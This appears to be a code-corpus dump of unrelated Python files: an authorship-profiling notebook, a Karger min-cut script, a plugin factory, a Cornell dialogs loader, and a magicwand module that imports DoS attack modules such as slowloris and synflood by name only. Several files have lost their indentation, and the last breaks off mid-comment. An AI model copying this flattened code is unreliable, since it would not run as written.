preprocess_path = join(project_root, Path('data/preprocess'))
random.seed(10)
# Thoughts: thresholds need to be custom to each profile. This would be a good opportunity to try to make a profile that gets more confident the more data about the author it has. The profile could model distributions of the differences between its sentences to its mean and other people's sentences to its mean. Then it can use these two distributions to determine which is more likely for incoming sentences.
#
# Question: Can euclidean distances from the mean or cosine similarites be treated as normal random variables?
# In[2]:
# Using function words for these experiments
function_words_train = pd.read_hdf(join(preprocess_path, "bawe_train_preprocessed_function_word_counter.hdf5"))
pos_bigrams_train = pd.read_hdf(join(preprocess_path, "bawe_train_preprocessed_pos2gram_counter.hdf5"))
train_set = pd.read_hdf(join(preprocess_path, "bawe_train_sentences.hdf5"))
# function_words_train = pd.concat([function_words_train, pos_bigrams_train], axis=1)
function_words_train = pos_bigrams_train
function_words_train
# In[3]:
std_train = (function_words_train - function_words_train.mean()) / function_words_train.std()
std_train
# In[ ]:
pca_vals, pca_vecs = np.linalg.eig(std_train.cov())
pca_vals
# In[3]:
# train_set.loc[(2, 3)]
train_set.loc[6]
# In[4]:
def select_good_features(df):
overall_var = df.var()
author_vars = df.groupby(level="author").var()
mean_explained_var = (overall_var - author_vars).mean()
# Features that reduce the variance within classes should hopefully be good
# features.
selections = mean_explained_var > 0
# The index of selctions should be the columns of the dataframe given the
# last few operations.
chosen_columns = selections[selections].index.tolist()
return df[chosen_columns]
# In[5]:
filtered_train = select_good_features(function_words_train)
filtered_train
# In[6]:
authors = filtered_train.index.get_level_values("author")
author_set = list(set(authors))
# experiment_authors = random.sample(author_set, 5)
experiment_authors = [1, 2, 5, 6]
experiment_authors
# In[7]:
# chosen_author = experiment_authors[5]
chosen_author = 6
chosen_author_sentences = filtered_train.loc[chosen_author]
chosen_author_sentences
# Question: If I take the mean of each sentence distance and include it in the mean instead of excluding it, does this affect the mean/var distance?
# In[8]:
included_sentences_distances = np.linalg.norm(chosen_author_sentences - chosen_author_sentences.mean(), axis=1)
included_sentences_distances_mean = included_sentences_distances.mean()
included_sentences_distances_var = included_sentences_distances.var()
def get_excluded_sentence_distances(array):
def sentence_distance(i):
selection = [True] * len(array)
selection[i] = False
return np.linalg.norm(array[i] - np.mean(array[selection]))
return np.array([sentence_distance(index) for index in range(len(array))])
excluded_sentence_distances = get_excluded_sentence_distances(chosen_author_sentences.to_numpy())
excluded_sentence_distances_mean = excluded_sentence_distances.mean()
excluded_sentence_distances_var = excluded_sentence_distances.var()
included_sentences_distances_mean, excluded_sentence_distances_mean
# Answer: Yes :(, the mean is consistently much lower because the sentence is included. This is unfortunate because the other method was much more efficient to compute.
# In[9]:
# plt.hist(excluded_sentence_distances)
# plt.show()
# Answer to previous question: Euclidean distances are not normal (no doy why would they be? euclidean distances from same distribution mean should on average be close to 0 and can't be lower than that).
#
# Question: What if I just pick a threshold that accounts for 95% of the author's sentences.
# In[10]:
# chosen_text = chosen_author_sentences.loc[0]
# chosen_sentence_distances = get_excluded_sentence_distances(chosen_text.to_numpy())
# index_threshold = math.floor(len(chosen_sentence_distances) * 0.6)
# threshold = np.sort(chosen_sentence_distances)[index_threshold]
# threshold, index_threshold
# In[11]:
chosen_author_sentences
# In[12]:
chosen_text = chosen_author_sentences.drop(index=(0,))
chosen_text
# In[13]:
normalized_text = (chosen_text - chosen_text.mean()) / chosen_text.var()
# Come back here on error
chosen_cov = chosen_text.cov()
eig_values, eig_vectors = np.linalg.eig(chosen_cov)
eig_values, eig_vectors = eig_values.real, eig_vectors.real
eig_sum = np.sum(eig_values)
k = 15
phi_list = chosen_text - chosen_text.mean()
omega_list = np.sum((phi_list[:k] * eig_vectors[:, :k].T), axis=1).to_numpy()
phi_hat = np.sum((omega_list[:k] * eig_vectors[:, :k]), axis=1)
np.flip(phi_hat)
# In[14]:
profile_mean = chosen_text.mean()
cutoff_texts = chosen_text
diffs = cutoff_texts - chosen_text.mean() - phi_hat
distances = np.linalg.norm(diffs, axis=1)
distances
# In[15]:
cutoff = np.mean(distances) + (np.std(distances) / 3.5)
cutoff
# In[16]:
same_distances = distances[distances > cutoff]
# In[17]:
outlier_cutoff = np.mean(same_distances) + (np.std(same_distances) / 3.5)
# np.sum(same_distances > outlier_cutoff) / distances.shape[0]
np.sum(same_distances > outlier_cutoff) / len(same_distances)
# In[18]:
filtered_train.loc[1].mean()
# In[19]:
np.linalg.norm(filtered_train.loc[1].mean() - filtered_train.mean())
# In[20]:
# suspect_texts = filtered_train.loc[experiment_authors[1], 0]
suspect_texts = filtered_train.drop(index=(chosen_author,))
# suspect_texts = chosen_author_sentences.loc[1]
suspect_diffs = suspect_texts - profile_mean - phi_hat
suspect_distances = np.linalg.norm(suspect_diffs, axis=1)
first_suspect_distances = suspect_distances[suspect_distances > cutoff]
# np.sum(first_suspect_distances > outlier_cutoff) / len(suspect_distances)
np.sum(first_suspect_distances > outlier_cutoff) / len(first_suspect_distances)
# In[21]:
# def euclidean_distance(mean, df):
# return np.linalg.norm(mean - df, axis=1)
# chosen_text_mean = chosen_text.mean()
# same_texts = chosen_author_sentences.drop(index=(0,))
# other_author_texts = filtered_train.drop(index=(chosen_author,))
# same_sentence_classifications = pd.DataFrame(
# euclidean_distance(chosen_text_mean, same_texts) > threshold, index=same_texts.index
# )
# other_sentence_classifications = pd.DataFrame(
# euclidean_distance(chosen_text_mean, other_author_texts) > threshold, index=other_author_texts.index
# )
# same_text_classifications = same_sentence_classifications.groupby(level=("text_id")).mean() > 0.5
# other_text_classifications = other_sentence_classifications.groupby(level=("author", "text_id")).mean() > 0.5
# same_flags = same_text_classifications.sum()
# same_length = len(same_text_classifications)
# other_flags = other_text_classifications.sum()
# other_length = len(other_text_classifications)
# tnr = (same_length - same_flags) / same_length
# tpr = other_flags / other_length
# tnr[0], tpr[0]
| 7,337 |
testagent/structure/testinstance.py
|
patriziotufarolo/testagent
| 1 |
2170125
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of cumulus-testagent.
# https://github.com/patriziotufarolo/cumulus-testagent
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2015, <NAME> <<EMAIL>>
class TestInstance(object):
def __init__(self, operation):
self.__preConditions = ""
self.__hiddenCommunications = ""
self.__expectedOutput = ""
self.__postConditions = ""
self.__input = {}
self.__operation = operation
def getOperation(self):
return self.__operation
def setPreConditions(self, pc):
self.__preConditions = pc
return
def getPreConditions(self):
return self.__preConditions
def setHiddenCommunications(self, hc):
self.__hiddenCommunications = hc
return
def getHiddenCommunications(self):
return self.__hiddenCommunications
def appendInput(self, key, value):
self.__input[key] = value
return
def getInputs(self):
return self.__input
def setExpectedOutput(self, eo):
self.__expectedOutput = eo
return
def getExpectedOutput(self):
return self.__expectedOutput
def setPostConditions(self, pc):
self.__postConditions = pc
return
def getPostConditions(self):
return self.__postConditions
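# --- Hypothetical usage sketch (not part of the original module) ---
# The operation name, input keys and expected output are invented.
if __name__ == "__main__":
    ti = TestInstance("login")
    ti.appendInput("username", "alice")
    ti.setExpectedOutput("200 OK")
    print("%s %s %s" % (ti.getOperation(), ti.getInputs(), ti.getExpectedOutput()))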
| 1,402 |
magicwand-data-generator/magicwand/magicwand_components/attacks/__init__.py
|
gregpaton08/magicwand-datatool
| 22 |
2170129
|
from .apachekill import *
from .sockstress import *
from .goloris import *
from .sht_rudeadyet import *
from .sht_slowloris import *
from .sht_slowread import *
from .httpflood import *
from .synflood import *
| 210 |
graph algorithms/Karger's min cut/Karger's min cut.py
|
Zymrael/Algorithm-greatest-hits
| 0 |
2168714
|
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 6 10:41:07 2019
@author: Zymieth
"""
import numpy as np
from copy import deepcopy
with open('L:\Algorithms\kargerMinCut.txt') as file:
graph = [n for n in [line.split('\t')[:-1] for line in file]]
class Graph(object):
def __init__(self,adjacency_list):
self.adj = {}
for i,d in enumerate(adjacency_list):
self.adj[i+1] = [int(num) for num in d]
self.deleteSelfLoops()
# keep a pristine copy so every findMinCut iteration restarts from the original graph
self.og = deepcopy(self.adj)
def selectNode(self):
return np.random.choice(list(self.adj.keys()),replace=False)
def selectEdge(self,node):
return np.random.choice(self.adj[node],replace=False)
def contract(self,node,edge):
self.adj[edge] = list(filter(lambda x: x != node,self.adj[edge]))
self.adj[edge].extend(list(filter(lambda x: x != edge,self.adj[node])))
del self.adj[node]
self.replace(node,edge)
def deleteSelfLoops(self):
for key in self.adj.keys():
self.adj[key] = list(filter(lambda x: x != key, self.adj[key]))
def replace(self,inst1,inst2):
for key in self.adj.keys():
self.adj[key] = [i if i!=inst1 else inst2 for i in self.adj[key]]
def findMinCut(self, iterations = 10):
min_cut = len(self.adj)
for i in range(iterations):
while len(list(self.adj.keys())) > 2:
node = self.selectNode()
edge = self.selectEdge(node)
self.contract(node,edge)
if min([len(i) for i in list(self.adj.values())]) < min_cut:
min_cut = min([len(i) for i in list(self.adj.values())])
self.adj = deepcopy(self.og)
return min_cut
s_graph = [[2],[1,3],[2,4],[3]]
G = Graph(s_graph)
x = G.findMinCut()
s_graph = graph
G = Graph(s_graph)
x = G.findMinCut(iterations=10000000)
| 1,933 |
experiments/dgp_kin8nm_adaptive_pruning.py
|
akuhren/selective_gp
| 14 |
2169423
|
#!/usr/bin/env python
import mlflow
from selective_gp.utils import (
load_data, get_model, get_ELBO, get_loglik, get_experiment_id,
eprint, bold, green, fit_layerwise, remove_points, get_prediction_times,
run_exists)
import click
def run_single(prior_weight, device, M, fold, n_folds):
# Get dataset and model
test_size = 1 / n_folds
dataset = load_data("uci_kin8nm", seed=fold, device=device,
test_size=test_size)
model = get_model(dataset, n_inducing=M, n_layers=2, device=device,
add_input=True)
# Create callback for logging status to tracking server
def status_cb():
mlflow.set_tag("current_epoch", model.epoch.item())
model.register_callback(status_cb, update_interval=10)
# Pre-fit model, first one layer at a time, then all layers jointly
eprint(bold("\nLayerwise pre-fit"))
fit_layerwise(model, dataset, batch_size=4096, max_epochs=300)
eprint(bold("\nJoint pre-fit"))
model.fit(X=dataset.X_train, Y=dataset.Y_train, batch_size=4096,
max_epochs=500)
# Infer probabilities of inclusion for all pseudo-points and sample
# from resulting distribution to prune model
eprint(bold("\nPruning"))
for gp in model.gps:
gp.variational_point_process.probabilities = 0.8
model.fit_score_function_estimator(
X=dataset.X_train, Y=dataset.Y_train, learning_rate=0.3, max_epochs=10,
n_mcmc_samples=32)
for gp in model.gps:
remove_points(gp)
# Post-fit model, all layers jointly
eprint(bold("\nJoint post-fit"))
model.fit(X=dataset.X_train, Y=dataset.Y_train, batch_size=4096,
max_epochs=500)
# Log metrics
eprint(bold("\nEvaluating metrics"))
model.eval()
log_lik, KL = get_ELBO(model, dataset, batch_size=4096)
clock_time, wall_time = get_prediction_times(model, dataset)
train_log_lik, test_log_lik = get_loglik(
model, dataset, train=True, test=True, batch_size=4096)
mlflow.log_metrics({
"log_lik": log_lik,
"KL": KL,
"ELBO": train_log_lik - KL,
"clock_time": clock_time,
"wall_time": wall_time,
"train_log_lik": train_log_lik,
"test_log_lik": test_log_lik,
})
for layer, gp in enumerate(model.gps, 1):
mlflow.log_param(f"M{layer}", gp.n_inducing)
eprint()
@click.command()
@click.option("--device", type=click.Choice(["cpu", "cuda"]), default="cpu")
@click.option("--n-folds", default=5)
@click.option("--initial-inducing", "M", default=150)
@click.option("--prior-weight", type=float, default=1.0)
def run(M, device, prior_weight, n_folds):
# ID of currently running experiment
exp_id = get_experiment_id("dgp_kin8nm_adaptive_pruning")
for fold in range(1, n_folds + 1):
eprint(bold(f"Fold {fold}/{n_folds}"))
# Set parameters and tags defining this run
params = {
"M": M, "prior_weight": prior_weight, "fold": fold
}
if run_exists(params):
eprint(green("Already exists\n"))
continue
with mlflow.start_run(experiment_id=exp_id):
mlflow.log_params(params)
run_single(device=device, n_folds=n_folds, **params)
if __name__ == "__main__":
run()
| 3,309 |
example.py
|
tobyshooters/tensorcheck
| 10 |
2166345
|
import numpy as np
import torch
from tensorcheck import tensorcheck
@tensorcheck({
"img": {
"dtype": np.uint8,
"shape": [1, 3, "H", "W"],
"range": [0, 255]
},
"mask": {
"dtype": torch.float32,
"shape": [1, 1, "H", "W"],
"range": [0, 1]
},
"return": {
"dtype": np.float32,
"shape": [1, 3, "H", "W"],
"range": [0, 255]
},
})
def apply_mask(img, mask):
# ...do compute
return img * mask.numpy()
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.uint8)
y = torch.rand(1, 1, 10, 7)
apply_mask(x, y)
# > tensorcheck.ShapeException: /mask/ dim 3 of torch.Size([1, 1, 10, 7]) is not W=8
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.uint8)
y = 2 * torch.rand(1, 1, 10, 8)
apply_mask(x, y)
# > tensorcheck.UpperBoundException: /mask/ max value 1.9982... is greater than 1
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.float)
y = torch.rand(1, 1, 10, 8)
apply_mask(x, y)
# > tensorcheck.DataTypeException: /img/ dtype float64 is not <class 'numpy.uint8'>
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.uint8)
y = torch.rand(1, 1, 10, 8).int()
apply_mask(x, y)
# > tensorcheck.DataTypeException: /mask/ dtype torch.int32 is not torch.float32
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.uint8)
y = torch.rand(1, 1, 10, 8)
apply_mask(x, y)
# > Success
| 1,418 |
kneedeepio/plugins/manager/pluginfactory.py
|
kneedeepio/python-plugin-framework
| 0 |
2170020
|
#!/usr/bin/env python3
### IMPORTS ###
import logging
import importlib
from kneedeepio.plugins.plugin import Plugin
from .exceptions import ServiceAlreadyRegisteredException
from .exceptions import ServiceNotRegisteredException
from .exceptions import PluginAlreadyLoadedException
from .exceptions import PluginNotLoadedException
### GLOBALS ###
### FUNCTIONS ###
### CLASSES ###
class PluginFactory:
def __init__(self, logging_srv):
self.logger = logging.getLogger(type(self).__name__)
self.logger.debug("Inputs - logging_srv: %s", logging_srv)
self._service_registry = {}
self._plugin_registry = []
self._load_callbacks = []
self._unload_callbacks = []
self.register_service("logging", logging_srv)
def register_service(self, service_type, service):
self.logger.debug("Inputs - service_type: %s, service: %s", service_type, service)
# Check if service type already registered.
if service_type in self._service_registry:
raise ServiceAlreadyRegisteredException("Service of type {} already registered.".format(service_type))
# Put service in registry
self._service_registry[service_type] = service
def load(self, module_name, class_name):
self.logger.debug("Inputs - module_name: %s, class_name: %s", module_name, class_name)
# Check if plugin is already loaded
for loaded_plugin in self._plugin_registry:
if loaded_plugin["module_name"] == module_name and loaded_plugin["class_name"] == class_name:
raise PluginAlreadyLoadedException
# Import the plugin
tmp_module = importlib.import_module(module_name)
self.logger.debug("tmp_module: %s", tmp_module)
# Create an instance of the plugin
tmp_class = getattr(tmp_module, class_name)
if not issubclass(tmp_class, Plugin):
raise TypeError("Plugin does not subclass kneedeepio.plugins.plugin.Plugin")
self.logger.debug("tmp_class: %s", tmp_class)
# NOTE: The logging service is always provided as it should always be used.
tmp_services = {"logging": self._service_registry["logging"]}
for tmp_service_type in tmp_class.required_services:
if tmp_service_type in self._service_registry:
tmp_services[tmp_service_type] = self._service_registry[tmp_service_type]
else:
raise ServiceNotRegisteredException("Service type '{}' not registered.".format(tmp_service_type))
tmp_instance = tmp_class(tmp_services)
self.logger.debug("tmp_instance: %s", tmp_instance)
# Store the instance in the registry list
self._plugin_registry.append({
"module_name": module_name,
"class_name": class_name,
"instance": tmp_instance
})
# Run the plugin instance setup
tmp_instance.setup()
# Call the load callbacks
for callback in self._load_callbacks:
callback(tmp_instance)
def unload(self, module_name, class_name):
self.logger.debug("Inputs - module_name: %s, class_name: %s", module_name, class_name)
# Check if plugin is already loaded
tmp_plugin = None
for loaded_plugin in self._plugin_registry:
if loaded_plugin["module_name"] == module_name and loaded_plugin["class_name"] == class_name:
tmp_plugin = loaded_plugin
if tmp_plugin is None:
raise PluginNotLoadedException
# Call the unload callbacks
for callback in self._unload_callbacks:
callback(tmp_plugin["instance"])
# Run the plugin instance teardown
tmp_plugin["instance"].teardown()
# Remove the instance from the registry
self._plugin_registry.remove(tmp_plugin)
# FIXME: How to un-import the plugin module?
# Is the un-import necessary?
# Have to check to make sure there aren't any other classes using
# the same module.
def register_load_callback(self, callback_method):
self.logger.debug("Inputs - callback_method: %s", callback_method)
# Add the callback method to the list of methods to call back on plugin load.
# The callback method should take one argument: the instance of the plugin.
self._load_callbacks.append(callback_method)
def register_unload_callback(self, callback_method):
self.logger.debug("Inputs - callback_method: %s", callback_method)
# Add the callback method to the list of methods to call back on plugin unload.
# The callback method should take one argument: the instance of the plugin.
self._unload_callbacks.append(callback_method)
def tick_plugins(self):
self.logger.debug("Inputs - None")
# Call the tick function for each of the plugins.
# This can be used as a heartbeat for the plugin, or used to perform a
# small amount of work.
for item in self._plugin_registry:
item["instance"].tick()
| 5,097 |
src/amuse/test/suite/ticket_tests/test_issue777.py
|
andrisdorozsmai/amuse
| 131 |
2169883
|
from amuse.test import amusetest
from amuse.units import units
from amuse.ic.brokenimf import new_kroupa_mass_distribution
class TestsForIssue777(amusetest.TestCase):
def test_upper_segment(self):
"Test if a star in the upper mass segment will get the right mass"
lower_limit = 1.0 | units.MSun
upper_limit = 1.0 | units.MSun
mass = new_kroupa_mass_distribution(
1,
mass_min=lower_limit,
mass_max=upper_limit,
)
self.assertEqual(mass[0], 1.0 | units.MSun)
def test_middle_segment(self):
"Test if a star in the middle mass segment will get the right mass"
lower_limit = 0.2 | units.MSun
upper_limit = 0.2 | units.MSun
mass = new_kroupa_mass_distribution(
1,
mass_min=lower_limit,
mass_max=upper_limit,
)
self.assertEqual(mass[0], 0.2 | units.MSun)
def test_lower_segment(self):
"Test if a star in the lower mass segment will get the right mass"
lower_limit = 0.02 | units.MSun
upper_limit = 0.02 | units.MSun
mass = new_kroupa_mass_distribution(
1,
mass_min=lower_limit,
mass_max=upper_limit,
)
self.assertEqual(mass[0], 0.02 | units.MSun)
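# A minimal sketch of the more common case, with the same imports as above:
# when mass_min and mass_max differ, new_kroupa_mass_distribution draws an
# array of masses from the broken power-law IMF instead of one fixed value.
#
#     masses = new_kroupa_mass_distribution(
#         1000,
#         mass_min=0.08 | units.MSun,
#         mass_max=100.0 | units.MSun,
#     )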
| 1,308 |
podium/datasets/impl/cornell_movie_dialogs.py
|
TakeLab/podium
| 51 |
2170240
|
"""
Module contains Cornell Movie-Dialogs Corpus, available at
http://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html.
"""
import os
import re
from collections import namedtuple
from podium.datasets.dataset import Dataset
from podium.datasets.example_factory import ExampleFactory
from podium.field import Field
from podium.storage import LargeResource
from podium.vocab import Vocab
try:
import pandas as pd
except ImportError:
print(
"Problem occured while trying to import pandas. If the library is not "
"installed visit https://pandas.pydata.org/ for more details."
)
raise
CornellMovieDialogsNamedTuple = namedtuple(
"CornellMovieDialogsNamedTuple",
["titles", "conversations", "lines", "characters", "url"],
)
class CornellMovieDialogs(Dataset):
"""
Cornell Movie Dialogs dataset which contains sentences and replies from
movies.
"""
def __init__(self, data, fields=None):
"""
Dataset constructor.
Parameters
----------
data : CornellMovieDialogsNamedTuple
cornell movie dialogs data
fields : dict(str : Field)
dictionary that maps field name to the field
Raises
------
ValueError
If given data is None.
"""
if data is None:
raise ValueError(
"Specified data is None, dataset expects "
"CornellMovieDialogsNamedTuple instance."
)
if not fields:
fields = CornellMovieDialogs.get_default_fields()
examples = CornellMovieDialogs._create_examples(data=data, fields=fields)
super(CornellMovieDialogs, self).__init__(
**{"examples": examples, "fields": fields}
)
@staticmethod
def _create_examples(data: CornellMovieDialogsNamedTuple, fields):
"""
Method creates examples for Cornell Movie Dialogs dataset.
Examples are created from the lines and conversations in data.
Parameters
----------
data : CornellMovieDialogsNamedTuple
cornell movie dialogs data
fields : dict(str : Field)
dictionary mapping field names to fields
Returns
-------
list(Example)
list of created examples
"""
example_factory = ExampleFactory(fields)
examples = []
lines = data.lines
lines_dict = dict(zip(lines["lineID"], lines["text"]))
conversations_lines = data.conversations["utteranceIDs"]
for lines in conversations_lines:
# we skip monologues
if len(lines) < 2:
continue
for i in range(len(lines) - 1):
statement = lines_dict.get(lines[i])
reply = lines_dict.get(lines[i + 1])
# some lines in the dataset are empty
if not statement or not reply:
continue
examples.append(
example_factory.from_dict({"statement": statement, "reply": reply})
)
return examples
@staticmethod
def get_default_fields():
"""
Method returns default Cornell Movie Dialogs fields: sentence and reply.
Fields share same vocabulary.
Returns
-------
fields : dict(str, Field)
Dictionary mapping field name to field.
"""
vocabulary = Vocab()
statement = Field(
name="statement",
numericalizer=vocabulary,
tokenizer="split",
keep_raw=False,
is_target=False,
)
reply = Field(
name="reply",
numericalizer=vocabulary,
tokenizer="split",
keep_raw=False,
is_target=True,
)
fields = {"statement": statement, "reply": reply}
return fields
class CornellMovieDialogsLoader:
"""
Class for downloading and parsing the Cornell Movie-Dialogs dataset.
This class is used for downloading the dataset (if it's not already
downloaded) and parsing the files in the dataset. If it's not already
    present in LargeResource.BASE_RESOURCE_DIR, the dataset is automatically
downloaded when an instance of the loader is created. The downloaded
resources can be parsed using the load_dataset method.
"""
URL = "http://www.cs.cornell.edu/~cristian/data/cornell_movie_dialogs_corpus.zip"
ARCHIVE_TYPE = "zip"
NAME = "cornell_movie_dialogs_corpus"
DATA_FOLDER_NAME = "cornell movie-dialogs corpus"
DELIMITER = " +++$+++ "
ENCODING = "iso-8859-1"
TITLE_FIELDS = ["movieID", "title", "year", "rating", "votes", "genres"]
TITLE_FILENAME = "movie_titles_metadata.txt"
CHARACTERS_FIELDS = [
"characterID",
"character",
"movieID",
"title",
"gender",
"position",
]
CHARACTERS_FILENAME = "movie_characters_metadata.txt"
LINES_FIELDS = ["lineID", "characterID", "movieID", "character", "text"]
LINES_FILENAME = "movie_lines.txt"
CONVERSATIONS_FIELDS = ["character1ID", "character2ID", "movieID", "utteranceIDs"]
CONVERSATIONS_FILENAME = "movie_conversations.txt"
URL_FIELDS = ["movieID", "title", "url"]
URL_FILENAME = "raw_script_urls.txt"
def __init__(self):
"""
        The constructor will check if the dataset has already been downloaded
        to the LargeResource.BASE_RESOURCE_DIR.
        If the dataset is not present, it will attempt to download it.
"""
LargeResource(
**{
LargeResource.RESOURCE_NAME: CornellMovieDialogsLoader.NAME,
LargeResource.ARCHIVE: CornellMovieDialogsLoader.ARCHIVE_TYPE,
LargeResource.URI: CornellMovieDialogsLoader.URL,
}
)
def load_dataset(self):
"""
Loads and parses all the necessary files from the dataset folder.
Returns
-------
data : CornellMovieDialogsNamedTuple
tuple that contains dictionaries for 5 types of Cornell movie dialogs data:
titles, conversations, lines, characters and script urls.
Fields for every type are defined in class constants.
"""
titles = self.load_titles()
conversations = self.load_conversations()
lines = self.load_lines()
characters = self.load_characters()
url = self.load_urls()
return CornellMovieDialogsNamedTuple(
titles=titles,
conversations=conversations,
lines=lines,
characters=characters,
url=url,
)
@staticmethod
def _load_file(file_name, fields, columns_hooks=None):
"""
Method loads file from Cornell movie dialogs dataset defined with file
name and fields that are used in the file.
Parameters
----------
file_name : str
string containing file path
fields : list(str)
list containing field names
columns_hooks : dict(str, callable)
functions that will be called on columns
variable represents dictionary that maps column name to a function
"""
data_frame = pd.read_csv(
filepath_or_buffer=os.path.join(
LargeResource.BASE_RESOURCE_DIR,
CornellMovieDialogsLoader.NAME,
CornellMovieDialogsLoader.DATA_FOLDER_NAME,
file_name,
),
sep=re.escape(CornellMovieDialogsLoader.DELIMITER),
encoding=CornellMovieDialogsLoader.ENCODING,
header=None,
names=fields,
engine="python",
)
if columns_hooks is not None:
for column_name in columns_hooks:
data_frame[column_name] = data_frame[column_name].apply(
columns_hooks[column_name]
)
return data_frame.to_dict(orient="list")
def load_titles(self):
"""
Method loads file containing movie titles.
"""
column_hooks = {}
column_hooks["genres"] = lambda s: s.strip("[]''").split("', '")
return self._load_file(
file_name=CornellMovieDialogsLoader.TITLE_FILENAME,
fields=CornellMovieDialogsLoader.TITLE_FIELDS,
columns_hooks=column_hooks,
)
def load_conversations(self):
"""
Method loads file containing movie conversations.
"""
column_hooks = {}
column_hooks["utteranceIDs"] = lambda s: s.strip("[]''").split("', '")
return self._load_file(
file_name=CornellMovieDialogsLoader.CONVERSATIONS_FILENAME,
fields=CornellMovieDialogsLoader.CONVERSATIONS_FIELDS,
columns_hooks=column_hooks,
)
def load_lines(self):
"""
Method loads file containing movie lines.
"""
return self._load_file(
file_name=CornellMovieDialogsLoader.LINES_FILENAME,
fields=CornellMovieDialogsLoader.LINES_FIELDS,
)
def load_characters(self):
"""
Method loads file containing movie characters.
"""
return self._load_file(
file_name=CornellMovieDialogsLoader.CHARACTERS_FILENAME,
fields=CornellMovieDialogsLoader.CHARACTERS_FIELDS,
)
def load_urls(self):
"""
Method loads file containing movie script urls.
"""
return self._load_file(
file_name=CornellMovieDialogsLoader.URL_FILENAME,
fields=CornellMovieDialogsLoader.URL_FIELDS,
)
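# A minimal end-to-end sketch using the classes above, assuming
# LargeResource.BASE_RESOURCE_DIR is configured and the corpus archive can be
# downloaded:
#
#     loader = CornellMovieDialogsLoader()
#     data = loader.load_dataset()
#     dataset = CornellMovieDialogs(data)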
| 9,730 |
cloud-warden/config.py
|
mijho/cloud-warden
| 0 |
2170069
|
"""Configuration - Static vars"""
import boto3
import os
ASG_CONFIG = boto3.client('autoscaling', region_name='eu-west-1')
EC2_CONFIG = boto3.client('ec2', region_name='eu-west-1')
WEBHOOK_URL = os.environ.get('WEBHOOK_URL')
SAWMILL_DEVELOPER_LOGS = os.environ.get('SAWMILL_DEVELOPER_LOGS')
SAWMILL_PB_MODE = os.environ.get('SAWMILL_PB_MODE')
AWS_REGIONS = [
'us-east-2', 'us-east-1', 'us-west-1', 'us-west-2', 'ap-east-1', 'ap-south-1', 'ap-northeast-1',
'ap-northeast-2', 'ap-northeast-3', 'ap-southeast-1', 'ap-southeast-2', 'ca-central-1', 'cn-north-1',
    'cn-northwest-1', 'eu-central-1', 'eu-west-1', 'eu-west-2', 'eu-west-3', 'eu-north-1', 'me-south-1',
'sa-east-1', 'us-gov-east-1', 'us-gov-west-1'
]
WARDEN_SCHEDULES = ['OfficeHours', 'ExtendedHours', 'DailyOnDemand', 'WeeklyOnDemand', 'terraform']
OFF_STATE = ['shutting-down', 'terminated', 'stopping', 'stopped']
ON_STATE = ['pending', 'running']
| 926 |
FinalYearProject/ConvolutionalNeuralNetwork/Train.py
|
nakster/FinalYearProject
| 1 |
2168317
|
# import tensorflow as tf
# import keras
# from keras.callbacks import TensorBoard
# import numpy as np
# import pandas as pd
# import matplotlib.pyplot as plt
# from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.optimizers import Adam
from keras.utils import np_utils
from keras.datasets import fashion_mnist
def Train():
# Load the fashion-mnist pre-shuffled train data and test data
(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()
print("x_train shape:", x_train.shape, "y_train shape:", y_train.shape)
# Show one of the images from the training dataset
# img_index = 3
# plt.imshow(x_train[img_index])
# plt.show()
# Reshaping to format which CNN expects (batch, height, width, channels)
x_train = x_train.reshape(x_train.shape[0], x_train.shape[1], x_train.shape[2], 1).astype('float32')
x_test = x_test.reshape(x_test.shape[0], x_test.shape[1], x_test.shape[2], 1).astype('float32')
#Data normalization
#We then normalize the data dimensions so that they are of approximately the same scale.
# normalize inputs from 0-255 to 0-1
x_train/=255
x_test/=255
# convert class vectors to binary class matrices
#number of classes
classes = 10
# one-hot encoding
    # e.g. if the output label is 8, its one-hot encoding is [0,0,0,0,0,0,0,0,1,0]
y_train = np_utils.to_categorical(y_train, classes)
y_test = np_utils.to_categorical(y_test, classes)
#Define the model
model = Sequential()
# Must define the input shape in the first layer of the neural network
model.add(Conv2D(filters=64, kernel_size=2, padding='same', activation='relu', input_shape=(28,28,1)))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.3))
model.add(Conv2D(filters=32, kernel_size=2, padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(classes, activation='softmax'))
# Take a look at the model summary
model.summary()
#Compile the model
model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
#Fit the model
model.fit(x_train,y_train, batch_size=64, epochs=10,validation_data=(x_test, y_test))
# Save the model to use test the pictures for later
model.save('Resources/CNNModel/fashionModel.h5')
# Evaluate the model on test set
score = model.evaluate(x_test, y_test, verbose=0)
# Print test accuracy
print("Metrics(Test lo ss & Test Accuracy): ")
print('Test loss:', score[0])
print('Test accuracy:', score[1])
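# A minimal follow-up sketch, assuming Train() has been run so that
# 'Resources/CNNModel/fashionModel.h5' exists; it reloads the saved model and
# classifies a single test image:
#
#     from keras.models import load_model
#     import numpy as np
#     model = load_model('Resources/CNNModel/fashionModel.h5')
#     (_, _), (x_test, y_test) = fashion_mnist.load_data()
#     sample = x_test[:1].reshape(1, 28, 28, 1).astype('float32') / 255
#     print('predicted:', np.argmax(model.predict(sample)), 'actual:', y_test[0])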
| 2,989 |
southpark-search/pods/text_loader.py
|
YueLiu-jina/examples
| 0 |
2168977
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
from typing import Dict
from jina.executors.crafters import BaseDocCrafter
class TextExtractor(BaseDocCrafter):
def craft(self, text: str, *args, **kwargs) -> Dict:
*_, s = text.split('[SEP]')
return dict(weight=1., text=s, meta_info=text.encode('utf8'))
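# A minimal illustration, assuming the indexed lines use '[SEP]'-delimited
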